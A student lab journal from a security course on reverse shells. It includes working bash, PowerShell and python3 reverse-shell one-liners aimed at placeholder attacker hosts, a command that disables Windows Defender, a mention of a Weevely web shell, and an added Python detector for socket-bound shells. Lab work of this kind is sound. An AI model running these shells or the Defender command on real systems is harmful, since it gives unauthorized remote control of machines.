Lab 8.2 ‐ Reverse Shells ‐ JM - Jacob-Mayotte/SEC335_Tech_Journal GitHub Wiki

Traffic Analysis of bash reverse shell

Deliverable 1: Bash Reverse Shell on Linux
  • Connected to SEC335-rocky with cyber.local creds.
  • Hosted an nc listener on port 4449 on my personal Kali box: `nc -nlvp 4449`
  • Then on SEC335-rocky I used the native bash reverse shell that was provided to connect to the nc listener. Command:

```bash
/bin/bash -i >& /dev/tcp/x.x.x.x/4449 0>&1
```

Replace x.x.x.x with the Kali box's eth0 DHCP address.

  • I could then interact with SEC335-rocky via the nc session hosted on my Kali box.

To fulfill the deliverable I ran a Wireshark capture on eth0 from the Kali VM, then followed the TCP stream between the correct IP addresses.

Deliverable 2: Test on Pippen
  • Elevated the Weevely PHP script that was built in the last lab:

[Screenshot: Weevely session on Pippen]

Deliverable 3: PowerShell Reverse Shells
  • Disabled Defender on the Windows host: `Set-MpPreference -DisableRealtimeMonitoring $true`

  • I then connected to my Kali box via Chrome Remote Desktop from the Windows machine.

  • On the Kali VM I hosted an nc listener.

  • Then I used an elevated command prompt to run:

```powershell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

Deliverable 4: Python3 Reverse Shell on Rocky

[Screenshot: Python3 reverse shell from rocky caught by the nc listener]

Command used:

```bash
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",4449));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
```

Replace Kali-IP with the Kali VM's IP address.
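Both the bash `/dev/tcp` shell in Deliverable 1 and the python3 `os.dup2` shell above leave the same host-side trace: a shell or interpreter process whose stdin/stdout/stderr are a socket instead of a tty. The following added example (my own, not part of this lab journal) checks for that on Linux by reading `/proc/<pid>/fd/{0,1,2}`; the process names in `SHELL_NAMES` and the sample process table are assumptions for illustration.

```python
import os
import re
from typing import Dict, List, Tuple

SOCKET_RE = re.compile(r"^socket:\[\d+\]$")  # readlink form of any socket fd
# Interpreters the two one-liners run as (assumption: extend for your hosts).
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "python", "python3"}
ProcTable = Dict[int, Tuple[str, Dict[int, str]]]  # pid -> (comm, {fd: target})


def flag_socket_bound_shells(procs: ProcTable) -> List[int]:
    """Pids of shell/interpreter processes whose stdin, stdout or stderr is a
    socket: bash after '>& /dev/tcp/... 0>&1', python after os.dup2."""
    hits = []
    for pid, (comm, fds) in procs.items():
        if comm in SHELL_NAMES and any(SOCKET_RE.match(fds.get(n, "")) for n in (0, 1, 2)):
            hits.append(pid)
    return sorted(hits)


def snapshot_proc(proc_root: str = "/proc") -> ProcTable:
    """Build the table from a live Linux /proc (other users' fd links need
    root); returns {} when proc_root cannot be listed."""
    procs: ProcTable = {}
    if not os.path.isdir(proc_root):
        return procs
    for entry in filter(str.isdigit, os.listdir(proc_root)):
        pid = int(entry)
        try:
            with open(f"{proc_root}/{pid}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            continue  # process exited or is not readable
        fds = {}
        for n in (0, 1, 2):
            try:
                fds[n] = os.readlink(f"{proc_root}/{pid}/fd/{n}")
            except OSError:
                pass  # fd closed or not readable
        procs[pid] = (comm, fds)
    return procs


# Constructed sample table (not a real capture) covering the cases that matter.
SAMPLE: ProcTable = {
    1234: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),  # normal login
    2345: ("bash", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),  # /dev/tcp
    2346: ("python3", {0: "socket:[48990]", 1: "socket:[48990]", 2: "socket:[48990]"}),  # dup2
    2347: ("bash", {0: "/dev/pts/3", 1: "/dev/pts/3", 2: "/dev/pts/3"}),  # pty.spawn child, looks normal
    3000: ("sshd", {0: "/dev/null", 1: "/dev/null", 2: "socket:[1200]"}),  # not a shell
}
```

On a live host run `flag_socket_bound_shells(snapshot_proc())` as root; note that the bash child of `pty.spawn` (pid 2347 in the sample) looks like a normal tty session on its own, so it is the parent python3 process that gets flagged.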

Source

Reflection/Sources:

This lab was probably one of the most of the semester! It was really informative to understand how someone can remotely execute commands via a reverse shell. It was nice to see the different perspective with the Wireshark captures (even in lab 8.1). This seems like a nice tool for threat actors, but it also seems to be easily detectable.